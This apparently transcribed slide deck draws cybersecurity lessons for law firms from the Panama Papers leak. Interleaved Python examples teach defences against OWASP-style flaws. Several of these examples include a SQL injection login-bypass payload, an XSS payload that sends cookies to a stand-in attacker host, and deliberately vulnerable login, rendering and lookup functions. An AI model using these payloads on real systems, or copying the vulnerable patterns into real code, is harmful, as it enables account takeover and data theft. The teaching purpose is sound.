The document discusses lessons that can be learned from the Panama Papers data leak. It summarizes how the leak occurred due to vulnerabilities in the law firm's outdated content management and email systems. It then outlines 10 common web application vulnerabilities like injection attacks, broken authentication, and sensitive data exposure. Finally, it provides recommendations for law firms to strengthen cybersecurity, such as implementing training, monitoring systems, conducting security audits, and engaging third-party penetration testing. The key takeaway is that all law firms must prioritize data security even if they believe they are not high-value targets.
Panama Papers Leak and Precautions Law firms should take
1. An exposé by
Lawyers! What to learn from the
Panama Papers Leak
Adv. Prashant Mali
Advocate Prashant Mali (www.prashantmali.com)
2. The Background
• The data breach at Mossack Fonseca, a Panamanian law firm, is being touted as the largest ever in terms of the sheer volume of information leaked.
• The leaked information allegedly details the ways dozens of high-ranking politicians, their relatives or close associates in more than 50 countries, including the U.K., France, Russia, China and India, have used offshore companies to hide income and avoid paying taxes.
3. The Numbers
• The leak reportedly covers 11.5 million confidential documents dating from the 1970s to late 2015.
• The 2.6 terabytes of leaked data include:
4.8 million emails
3 million database files
2.2 million PDFs
1.1 million images
320,000 text documents
4. How did the Leak happen?
• The leak stems from an email hack.
• An email server attack could have happened in multiple ways.
• The firm's client portal was found vulnerable to DROWN: its servers still accepted the old, deprecated SSLv2 protocol. A server that supports SSLv2 (or shares its RSA key with one that does) lets an attacker decrypt recorded TLS sessions from modern clients, so "nobody uses SSLv2 any more" is no defence.
5. How did the Leak happen?
• The portal ran the open source Drupal Content Management System (CMS) on an outdated version that had not been updated for two years.
• That outdated CMS version was vulnerable to SQL injection, a class of flaw that accounts for a large share of web data breaches worldwide.
• Other application layer vulnerabilities on the portal were Cross-Site Scripting, Cross-Site Request Forgery and brute-force bypass, among others.
6. How did the Leak happen?
• Security researchers claimed that certain back-end parts of the site were also reachable with simple requests that any novice attacker could have guessed.
• The firm's Microsoft Outlook Web Access had last been updated in 2009, seven years earlier.
• Email was stored and transmitted unencrypted. Combined with application and system level security of this standard, it was incredibly easy for attackers to obtain admin-level privileges.
7. 1. Injection
• Injection happens when the application builds a command or query (SQL, OS, LDAP) by concatenating user input into it, so the input is interpreted as part of the command rather than as data.
• A login form is the classic entry point: a crafted username can turn the authentication query into one that always succeeds, giving the attacker a legitimate-looking session.
• Any input the server processes will do, from sign-in forms to comment boxes.
• Business risk: attackers have a direct way of interacting with the database or server.
• They can steal data, change it, delete it, deny access and do much more.
• Injection attacks such as SQL injection are allegedly behind major data breaches at Ashley Madison and Sony.
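The login-bypass case described above, shown as an added example that is not part of the original deck and not the Drupal code Mossack Fonseca ran. It uses an in-memory SQLite table with constructed users; the table holds plaintext passwords purely so the query result is easy to read (real systems store hashes, see the sensitive data exposure slide). The vulnerable function splices input into the SQL text, the safe one uses driver parameters; both are called with the same payload.

```python
import sqlite3

# Constructed sample data for the demonstration: a tiny client-portal user table.
SAMPLE_USERS = [
    ("alice", "correct horse battery staple", "partner"),
    ("bob", "hunter2", "paralegal"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory portal database with the constructed users above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """The anti-pattern: user input is spliced into the SQL text, so the
    input can change the query's structure. Returns the matched role or None."""
    query = (
        "SELECT role FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterised query: the driver sends the SQL and the values separately,
    so the values can never be parsed as SQL. Same interface, same result for
    honest input."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Classic login-bypass payload: closes the username string, makes the WHERE
# clause always true, and comments out the password check.
BYPASS_USERNAME = "' OR '1'='1' --"

if __name__ == "__main__":
    db = make_db()
    print("honest login   :", login_safe(db, "alice", "correct horse battery staple"))
    print("bypass, unsafe :", login_vulnerable(db, BYPASS_USERNAME, "anything"))
    print("bypass, safe   :", login_safe(db, BYPASS_USERNAME, "anything"))
```

Against the vulnerable function the payload returns the first row ("partner") without knowing any password; against the parameterised one it is just a username nobody has. Input filtering on the login page, which the slide mentions, is a secondary control; the primary fix is never building the query from strings.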
8. 2. Broken Authentication & Session Management
• Weaknesses in account handling, password recovery and session handling (predictable or long-lived session IDs, no lockout on repeated failures, sessions that survive login) all increase risk.
• It is essential to control account log-in tightly: unique user IDs, strong passwords, and sessions that expire and are reissued at login.
• Business risk: attackers can take over accounts completely.
• In severe cases, stolen database records are sold on underground black markets.
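An added example of the session controls the slide calls for; it is not code from the original deck. The store issues unguessable IDs, expires idle sessions, reissues the ID at login (which defeats session fixation) and locks an account after repeated failed logins. The lifetime and lockout values are assumed policy settings, not figures from the page.

```python
import secrets
from typing import Optional

SESSION_LIFETIME = 30 * 60   # idle seconds before a session expires (assumed policy)
MAX_FAILED_LOGINS = 5        # lockout threshold (assumed policy)
LOCKOUT_SECONDS = 15 * 60


class SessionStore:
    """Minimal server-side session and login-attempt tracking."""

    def __init__(self):
        self._sessions = {}   # session id -> {"user": str, "expires": float}
        self._failures = {}   # username -> (failure count, locked_until)

    def create_session(self, user: str, now: float) -> str:
        # 256 bits from the OS CSPRNG: not guessable, unlike sequential or
        # timestamp-derived IDs.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "expires": now + SESSION_LIFETIME}
        return sid

    def rotate_session(self, old_sid: str, now: float) -> Optional[str]:
        """Issue a fresh ID at login, so an ID an attacker planted before
        authentication (session fixation) never becomes an authenticated one."""
        entry = self._sessions.pop(old_sid, None)
        if entry is None:
            return None
        return self.create_session(entry["user"], now)

    def user_for(self, sid: str, now: float) -> Optional[str]:
        """Resolve a session ID, refusing expired ones and extending live ones."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now > entry["expires"]:
            del self._sessions[sid]
            return None
        entry["expires"] = now + SESSION_LIFETIME
        return entry["user"]

    def is_locked(self, user: str, now: float) -> bool:
        _, locked_until = self._failures.get(user, (0, 0.0))
        return now < locked_until

    def note_failure(self, user: str, now: float) -> None:
        """Count a failed login; lock the account once the threshold is hit."""
        count, locked_until = self._failures.get(user, (0, 0.0))
        count += 1
        if count >= MAX_FAILED_LOGINS:
            locked_until = now + LOCKOUT_SECONDS
            count = 0
        self._failures[user] = (count, locked_until)

    def note_success(self, user: str) -> None:
        self._failures.pop(user, None)
```

The login handler checks `is_locked` before verifying the password, calls `note_failure` or `note_success`, and on success calls `rotate_session` on whatever ID the browser already had. Per-account lockout alone does not stop password spraying across many accounts; rate limiting by source address is a separate control.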
9. 3. Cross-site Scripting
• One of the most common web vulnerabilities: the application echoes attacker-controlled input into a page without encoding it, so the attacker's script runs in other users' browsers with the site's own privileges.
• Poses a threat to both users and the website.
• The attacker does not need to intercept traffic; the vulnerable site itself delivers the script, which can then read session data, alter the page or send requests as the victim.
• Cross-Site Scripting not only harms the website but also lets attackers redirect users to any other URL.
• Business risk: attackers can deface the homepage and inject malware into the site.
• Usually leads to the website being flagged or blocked by search engines and browsers.
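An added example, not code from the original deck: a comment-rendering function in its vulnerable and its encoded form, fed constructed attacker input that targets both an attribute value and the page body. The payload strings and the HTML template are assumptions for the demonstration.

```python
import html

# Constructed attacker input: a "comment" on the portal that tries to run script
# in the body, and a display name that tries to break out of an attribute.
ATTACKER_COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTACKER_NAME = '" onfocus="alert(1)" autofocus="'


def render_comment_vulnerable(author: str, body: str) -> str:
    """String concatenation straight into HTML: whatever the user typed is
    parsed by the browser as markup, so the script tag above executes."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """Encode for the context the value lands in. html.escape with quote=True
    covers text content and double-quoted attribute values: < > & " ' become
    entities, so the browser treats them as characters, never as markup."""
    return (
        f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
        f'<p>{html.escape(body, quote=True)}</p></div>'
    )


def contains_active_markup(fragment: str) -> bool:
    """Crude check used only to make the difference visible: does the rendered
    fragment contain a raw <script> tag or an injected event-handler attribute?"""
    low = fragment.lower()
    return "<script" in low or ' onfocus="' in low
```

Output encoding is context specific: `html.escape` is right for element text and quoted attributes, but a value placed inside a `<script>` block, a URL, or a CSS rule needs encoding for that context, and a templating engine with auto-escaping should do this by default rather than relying on each developer remembering.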
10. 4. Insecure Direct Object References
• This vulnerability appears when simply changing a number in the URL (a document or account ID) and pressing enter returns data belonging to someone else, because the identifier is predictable and the server never checks that the requester is entitled to that object.
• Multiple predictable patterns let attackers walk through the database and read restricted records.
• Business risk: an attacker can access and expose a lot of data.
• Where the same missing check exists on update or delete endpoints, the attacker can alter or destroy other users' records as well.
11. 5. Security Misconfiguration
• Misconfiguration is a hard vulnerability to handle because it covers security lapses at every level of the stack: server, framework, application and accounts.
• Many system administrators never change default passwords or disable ports and accounts they no longer use.
• Attackers look for such small lapses, combine them, and try to make something big out of it.
• Business risk: can lead to complete loss of data through alteration, deletion and theft.
• Attackers chain one weakness after another to reach the database.
12. 6. Sensitive Data Exposure
• Sensitive data should be encrypted both at rest and in transit using standard, well-reviewed cryptographic algorithms.
• Passwords are the exception: they should not be encrypted but stored as salted, deliberately slow hashes, so that a stolen database does not yield usable credentials.
• Done properly, this ensures that even if the password hashes or credit card records are stolen, the attacker cannot use them directly.
• Keys must be managed so that only authorised systems can unlock the data; encryption with the key stored next to the data protects nothing.
• Business risk: loss of sensitive data, passwords, credit card information, addresses and bank statements.
• May have serious repercussions on credibility.
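An added example of the password storage the slide calls for, not code from the original deck: PBKDF2-HMAC-SHA256 from the standard library with a per-user random salt, constant-time verification, and a self-describing record so the work factor can be raised later. The iteration count is an assumed policy value.

```python
import hashlib
import hmac
import os

# Parameters for PBKDF2-HMAC-SHA256. The iteration count is a policy choice
# (assumed here) and should be raised as hardware gets faster.
ITERATIONS = 210_000
SALT_BYTES = 16
ALGORITHM = "pbkdf2_sha256"


def hash_password(password: str) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest.
    Storing the parameters with the hash lets old records be verified and
    upgraded after the policy changes."""
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{ALGORITHM}${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored parameters and compare in constant time,
    so timing does not leak how many leading bytes matched."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
        if algo != ALGORITHM:
            return False
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
        )
        return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
    except ValueError:          # malformed record
        return False


def needs_rehash(stored: str) -> bool:
    """True if the record predates the current algorithm or work factor;
    call after a successful login and re-store with hash_password."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM:
        return True
    return int(parts[1]) < ITERATIONS
```

Reversible encryption of passwords, which the slide's wording suggests, means anyone with the key (or the application's own code path) can recover every password; a salted slow hash has no key to steal. If a dedicated library is available, a memory-hard function such as scrypt or Argon2 is preferable to PBKDF2.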
13. 7. Missing Function Level Access Control
• Admin functions are the most sensitive ones and access to them must be enforced on the server, not merely hidden from the menu.
• Many companies never verify that only authorised accounts can reach privileged functions: the link is simply not shown to ordinary users, but anyone who knows or guesses the URL can call it.
• Business risk: once an attacker reaches admin functions they can change a lot, including application data and settings.
• Serious tangible and intangible consequences and loss of credibility.
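One added example serving both the Insecure Direct Object References slide and this one, not code from the original deck: a document lookup that checks object ownership, and an admin-only function guarded by a server-side role check rather than by a hidden link. The user roles, the document store and the sequential IDs are constructed for the demonstration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str            # "client", "attorney" or "admin" (assumed role names)


@dataclass
class Document:
    doc_id: int
    owner: str
    title: str


# Constructed sample data: sequential IDs, exactly the pattern IDOR exploits.
DOCUMENTS = {
    1001: Document(1001, "alice", "Trust deed, Alice"),
    1002: Document(1002, "bob", "Share register, Bob"),
}


def get_document_vulnerable(requester: User, doc_id: int) -> Document:
    """Looks up by ID only. Bob can read 1001 by changing the number in the URL."""
    return DOCUMENTS[doc_id]


def get_document_safe(requester: User, doc_id: int) -> Document:
    """Object-level check: the record must belong to the requester (admins may
    see all). Unknown and foreign IDs produce the same error, so the endpoint
    cannot be used to enumerate which IDs exist."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or (doc.owner != requester.name and requester.role != "admin"):
        raise PermissionError("not found")
    return doc


def require_role(*roles):
    """Decorator enforcing function-level access control on the server side."""
    def wrap(fn):
        def guarded(requester: User, *args, **kwargs):
            if requester.role not in roles:
                raise PermissionError(f"{fn.__name__} requires role in {roles}")
            return fn(requester, *args, **kwargs)
        return guarded
    return wrap


@require_role("admin")
def delete_document(requester: User, doc_id: int) -> bool:
    """An admin-only function. Hiding its link in the UI is not enough; the
    decorator makes the check run for every caller, whatever URL they typed."""
    return DOCUMENTS.pop(doc_id, None) is not None
```

The two checks are different questions: "may this user use this function at all" (role) and "may this user touch this particular record" (ownership). Both need to hold, and using random identifiers instead of sequential ones makes guessing harder but is not a substitute for either check.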
14. 8. Cross-Site Request Forgery (CSRF)
• A request is forged when a customer who is logged in to the site visits an attacker's page: a hidden image tag or auto-submitting form makes the customer's browser send a request to the site, and the browser attaches the customer's session cookie automatically.
• The customer thus initiates a command (change of email address, money transfer) that they never see.
• Business risk: unwanted requests, purchases and money transfers carried out under the customer's identity.
• Because such requests arrive with a valid session, the site can never be sure of their genuineness, and customers gradually lose trust in the website.
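An added example of the standard defence, not code from the original deck: a per-session anti-forgery token derived with an HMAC, checked on every state-changing request. The session identifier, the form fields and the server secret are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Server-side secret; in a real deployment it is loaded from configuration.
CSRF_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token = HMAC(secret, session_id). It is embedded in the page as a hidden
    form field or header. An attacker's page cannot read it (same-origin
    policy), and unlike a cookie the browser does not attach it on its own."""
    return hmac.new(CSRF_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def request_allowed(session_id: str, form_fields: dict) -> bool:
    """Server-side check for every state-changing request: the token must be
    present and must match the one bound to this session."""
    supplied = form_fields.get("csrf_token")
    if not supplied:
        return False
    return hmac.compare_digest(supplied, issue_csrf_token(session_id))


# Constructed requests. Both arrive with the victim's session cookie, because
# the browser attaches it to any request to the site.
SESSION = "sess-9f1c"
genuine_request = {
    "to": "client-trust-account",
    "amount": "100",
    "csrf_token": issue_csrf_token(SESSION),
}
forged_request = {"to": "attacker-account", "amount": "9000"}  # from <img>/<form> on another site
```

The token must be unpredictable per session and compared in constant time; a token that is the same for all users, or one readable from a cookie without the HttpOnly flag, defeats the purpose. Setting session cookies with `SameSite=Lax` or `Strict` is a complementary control that stops the browser attaching the cookie to cross-site form posts in the first place.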
15. 9. Using Components with Known Vulnerabilities
• Applications are built from open source libraries, frameworks and CMS platforms; when these are not kept up to date, the application inherits every publicly known vulnerability in them, exactly as Mossack Fonseca's two-year-old Drupal did.
• Business risk: third-party code brings risks the development team never reviewed.
• Cross-site scripting, injection risks and business logic loopholes are just some of the examples.
• Such vulnerabilities bring data breach, access control, defacement and theft risks.
16. 10. Unvalidated Redirects and Forwards
• The application redirects to a destination taken from a request parameter without checking it, so a link that starts with the genuine domain can send the customer to a site that looks exactly like the one they wanted but is not. Fraudsters collect credentials through it.
• Most websites do not even know their own redirect endpoints are being used this way, and the phishing link looks genuine because it begins with the trusted domain.
• Customers should be careful about phishing, but it is not realistic to expect them to spot a redirect to the wrong website. The onus is on the website owner.
• Business risk: attackers can install malware or harvest credentials through phishing.
• Customers lose trust in the attacked website.
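An added example, not code from the original deck: a redirect-target validator for a "next" parameter of the kind a login page carries. It goes slightly beyond the slide by covering the usual bypasses (scheme-relative `//host`, `javascript:` URLs, credentials-in-URL tricks and backslash confusion). The portal hostname and the default landing page are assumptions.

```python
from urllib.parse import urljoin, urlparse

# Hosts the portal may redirect to, and where to land otherwise (assumed).
ALLOWED_HOSTS = {"portal.example-law.com"}
DEFAULT_TARGET = "/dashboard"


def safe_redirect_target(next_param, request_base="https://portal.example-law.com/login"):
    """Return a redirect destination on the portal, or the default.

    Rejects absolute URLs to other hosts, scheme-relative '//evil' links,
    non-http(s) schemes such as javascript:, userinfo tricks like
    https://portal.example-law.com@evil.example/, and backslashes, which some
    browsers treat as slashes (so '/\\evil.example' becomes '//evil.example').
    """
    if not next_param or "\\" in next_param:
        return DEFAULT_TARGET
    resolved = urljoin(request_base, next_param)
    parts = urlparse(resolved)
    if parts.scheme not in ("http", "https") or parts.netloc not in ALLOWED_HOSTS:
        return DEFAULT_TARGET
    # Return only path and query, never the attacker-supplied authority.
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return target


if __name__ == "__main__":
    for candidate in ("/matters/42?tab=docs", "https://evil.example/", "//evil.example/",
                      "javascript:alert(1)", "https://portal.example-law.com@evil.example/",
                      "/\\evil.example"):
        print(f"{candidate!r:50} -> {safe_redirect_target(candidate)}")
```

Returning a relative path rather than echoing the validated absolute URL is deliberate: it removes the host from the attacker's control entirely, so a later change to the parsing rules cannot reopen the hole.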
17. Solutions for such Attacks
• A complete web application security solution is needed, one that can detect, protect against and monitor the various attacks.
• Total Application Security (TAS) is an integrated web application security and compliance solution.
• It helps organisations detect application layer vulnerabilities accurately, patch them instantly without any change in code, and continuously monitor for emerging threats and DDoS attacks to mitigate them.
• TAS does this with web application scanning (detect), virtual patching through a web application firewall (protect), and continuous traffic monitoring for emerging threats and DDoS attacks (monitor).
• It also includes 24x7 managed service support to perform pen testing, create custom rules and keep false positives at zero.
18. Ensure Data Security at your Law firm
• Up to now, the only entities that seemed concerned with data security were large corporations and health care organisations.
• With reports of security breaches making headline news on a weekly basis, data security has become top-of-mind for every business and for every person who carries and uses a credit card.
• The threat of a data breach attack is a risk for law firms, too.
• The threat is reason enough to enact more stringent security policies, but there is another compelling reason: the security requirements of your own clients.
• Small law firms might think that they are not a target, but even they have clients with desirable data. It could even be that your law firm is a much easier target than a corporate entity.
• It is a problem law firms cannot ignore, no matter their size.
19. What can Law firms of any size do to better manage Cyber security?
20. Control Chaos
• If you need to make changes to security, the changes should be implemented in a way that does not impede attorneys' ability to perform work for clients.
• Your firm should balance the need to protect client data and the need to access it.
• Consider the remediation steps for preventing CryptoLocker ransomware. You can lock down the firm's firewalls, desktops and email, but if done in an overly aggressive manner the changes can have negative side effects: users cannot upload to court websites; one-off applications like those common in litigation may fail; email scanning false positives cause missed email, and so on.
• With planning, training, proper advance notification and staggering the change among users, the side effects can be minimised.
21. Prepare, Plan and Train
• Disruptions in productivity can be avoided through careful technology selection, planning and preparation.
• These days, maintaining a current firewall is not enough protection. Select the security systems that provide the best mix of ease of use and security.
• Implement new systems and procedures only after they have been vetted and tested by a small group of users.
• Prepare new users by giving them advance notice and creating a training plan that covers the topics in language they understand.
• Security awareness training is designed to increase end users' awareness of the firm's security policies and of potential threats to the firm, and to increase their willingness to adhere to the firm's security requirements.
• It is probably the most important step in preventing incidents such as the CryptoLocker ransomware that has infected numerous law firms in the last few months.
22. You should plan to cover
• Electronic communications
• Incident reporting
• Internet access
• Mobile device security
• Password policies
• Remote access
• Social media use
• The firm's Acceptable Use Policy
• Visitor policies
• Wireless access security
23. Verify Your Vendors
• Your firm's vendors must also follow proper security protocols.
• Vendors, especially those hosting your data in the cloud, need to pay particular attention to securing and protecting your data.
• Review every vendor's commitment to protecting your data, as well as their security certifications and policies.
24. Monitor Your Systems
• Every firm should employ top-notch antivirus, antispam, anti-malware and intrusion detection.
• Manage these critical systems to ensure that protection is active (e.g., not disabled by end users) and up to date.
• Routinely check firewall logs. These will show the extent to which your users are under attack and make you aware of administrative access and changes to your firewall.
• Periodically check the firewall configuration for unwanted changes.
• You should also manage and monitor user accounts: scan for accounts that have not been used for a period of time, stale passwords, and membership in administrative groups.
• Every IT administrator has added users to high-level security groups, such as domain administrators, in order to test and troubleshoot issues, only to accidentally leave them in groups where they do not belong.
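An added example of the routine checks this slide describes, not code from the original deck: it runs over a constructed account inventory and a handful of constructed firewall log lines (not real data; the log format is assumed) and reports idle accounts, stale passwords, unexpected members of the admin group, repeated denies from one source, and firewall configuration changes.

```python
from datetime import datetime

# Constructed account inventory: name, last logon, last password change, groups.
ACCOUNTS = [
    {"name": "alice",    "last_logon": "2016-04-01", "pw_changed": "2016-02-10", "groups": ["Attorneys"]},
    {"name": "bob",      "last_logon": "2015-09-12", "pw_changed": "2014-11-03", "groups": ["Paralegals"]},
    {"name": "svc-scan", "last_logon": "2016-03-30", "pw_changed": "2013-01-15", "groups": ["Domain Admins"]},
    {"name": "carol",    "last_logon": "2016-03-29", "pw_changed": "2016-03-01", "groups": ["Attorneys", "Domain Admins"]},
]
APPROVED_ADMINS = {"carol"}   # who is supposed to hold domain admin rights

# Constructed firewall log lines in an assumed "timestamp ACTION key=value ..." format.
FIREWALL_LOG = """\
2016-04-02T01:12:03 DENY src=203.0.113.5 dst=198.51.100.10 dport=22
2016-04-02T01:12:04 DENY src=203.0.113.5 dst=198.51.100.10 dport=22
2016-04-02T01:12:05 DENY src=203.0.113.5 dst=198.51.100.10 dport=3389
2016-04-02T03:40:11 DENY src=192.0.2.77 dst=198.51.100.10 dport=445
2016-04-02T09:30:00 ALLOW src=198.51.100.23 dst=198.51.100.10 dport=443
2016-04-02T09:31:42 CONFIG-CHANGE user=bob rule=allow-any-inbound
"""


def _day(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d")


def stale_accounts(accounts, as_of: datetime, max_idle_days: int = 90):
    """Accounts nobody has logged in with for longer than the idle limit."""
    return sorted(a["name"] for a in accounts
                  if (as_of - _day(a["last_logon"])).days > max_idle_days)


def stale_passwords(accounts, as_of: datetime, max_age_days: int = 180):
    """Accounts whose password is older than policy allows."""
    return sorted(a["name"] for a in accounts
                  if (as_of - _day(a["pw_changed"])).days > max_age_days)


def unexpected_admins(accounts, approved, admin_group: str = "Domain Admins"):
    """Members of the admin group who are not on the approved list: the
    troubleshooting leftovers the slide warns about."""
    return sorted(a["name"] for a in accounts
                  if admin_group in a["groups"] and a["name"] not in approved)


def firewall_findings(log_text: str, deny_threshold: int = 3):
    """Sources with repeated denies (scanning / brute force) and every
    configuration change, with who made it."""
    denies, changes = {}, []
    for line in log_text.splitlines():
        tokens = line.split()
        stamp, action = tokens[0], tokens[1]
        fields = dict(kv.split("=", 1) for kv in tokens[2:])
        if action == "DENY":
            denies[fields["src"]] = denies.get(fields["src"], 0) + 1
        elif action == "CONFIG-CHANGE":
            changes.append((stamp, fields["user"], fields["rule"]))
    noisy = {src: n for src, n in denies.items() if n >= deny_threshold}
    return {"noisy_sources": noisy, "config_changes": changes}


if __name__ == "__main__":
    today = _day("2016-04-02")
    print("idle accounts   :", stale_accounts(ACCOUNTS, today))
    print("stale passwords :", stale_passwords(ACCOUNTS, today))
    print("unexpected admin:", unexpected_admins(ACCOUNTS, APPROVED_ADMINS))
    print("firewall        :", firewall_findings(FIREWALL_LOG))
```

In practice the inventory comes from the directory (for Active Directory, the `lastLogonTimestamp` and `pwdLastSet` attributes and group membership) and the log from the firewall's export; the point is that each of the slide's checks is a query that can be scheduled, not a manual review someone forgets.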
25. Make System Entry Difficult
• Law firms of all sizes should be using two-factor authentication.
• Two-factor authentication requires two things from a user before they are allowed to access a system: something the user has and something the user knows.
• The item the user has is a token, either a physical token or an application on a smartphone.
• The thing the user knows is their password or PIN.
• Together, these provide a significant increase in the security of systems accessed remotely.
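An added example of the smartphone-app token the slide mentions, not code from the original deck: the time-based one-time password (TOTP, RFC 6238) built on HOTP (RFC 4226) with nothing but the standard library. The key is the RFC reference key so the codes can be checked against the published test vectors; a real deployment generates a random key per user.

```python
import base64
import hashlib
import hmac
import struct
import time


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """HOTP (RFC 4226): HMAC-SHA1 over the big-endian 8-byte counter, then
    dynamic truncation to a 31-bit integer, then the last `digits` decimals."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(key: bytes, at_time: float, step: int = 30, digits: int = 6) -> str:
    """TOTP (RFC 6238): HOTP with the counter derived from the clock."""
    return hotp(key, int(at_time) // step, digits)


def verify_totp(key: bytes, code: str, at_time: float, window: int = 1) -> bool:
    """Accept the current 30-second step and `window` steps either side to
    tolerate clock drift; compare in constant time. Production code must also
    refuse a code that was already accepted in the same step (replay)."""
    counter = int(at_time) // 30
    return any(hmac.compare_digest(hotp(key, counter + d), code)
               for d in range(-window, window + 1))


def provisioning_secret(key: bytes) -> str:
    """Base32 form of the key, which is what authenticator apps accept."""
    return base64.b32encode(key).decode().rstrip("=")


# RFC 4226 / RFC 6238 reference key, used so the output can be checked against
# the published test vectors. Generate a random 20-byte key per user in practice.
RFC_KEY = b"12345678901234567890"

if __name__ == "__main__":
    print("secret for the app:", provisioning_secret(RFC_KEY))
    print("code right now    :", totp(RFC_KEY, time.time()))
```

The server and the phone share only the key; the code is a function of the key and the clock, so it proves possession of the device without the device ever sending the key. The key must be stored with the same care as a password hash cannot provide (it has to be recoverable), which is why TOTP secrets belong in an HSM or an encrypted store rather than in the users table.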
26. Prioritize Physical Security
• Physical security is also important.
• Server room doors and cabinets should be locked when possible.
• You may also want to consider investing in an affordable security camera system that includes options for recording physical access.
• Stored data should be encrypted.
• Consider implementing a clean-and-clear desk policy, which requires everyone to log off their computers when not using them and to lock computers when they walk away.
• The policy should extend to laptops and other data storage devices, which should be locked away when the employee is not present.
• No data, either printed or electronic, should be left unattended.
27. Engage 3rd Party for Security Audits
• After you have determined your new policies, put new systems and protections in place and trained your end users, you should consider bringing in a third party.
• Someone not regularly involved with the firm's day-to-day IT needs to perform a security analysis.
• An outside security expert will perform a top-down evaluation of your systems, security policies and practices, and will review physical access to the systems.
28. Try to Break In
• A penetration test is the process of trying to break into a system in order to identify vulnerabilities.
• A pen test has to be executed with care, because if it is performed recklessly it can cause system or network damage through buffer overflows, Denial of Service (DoS) attacks and misconfiguration of systems.
• Strive to repeat pen tests at least annually, or more often.
• If you change your firewall or other major systems during the year, you should repeat the pen test.
29. Remediate Carefully
• At the end of a security audit or pen test, you will receive a remediation plan.
• The IT department should carefully review the recommended changes before implementation to consider any possible adverse effects on other systems and end users.
• Some believe that threats are irrelevant for small firms, but nothing could be further from the truth!
• It is increasingly common for clients of law firms to dictate security requirements, so all firms should make strengthening security policies a top priority.
30. THANK YOU
ADV. PRASHANT MALI
Email: cyberlawconsulting@gmail.com
Web site: www.prashantmali.com
Twitter: @CyberMahaGuru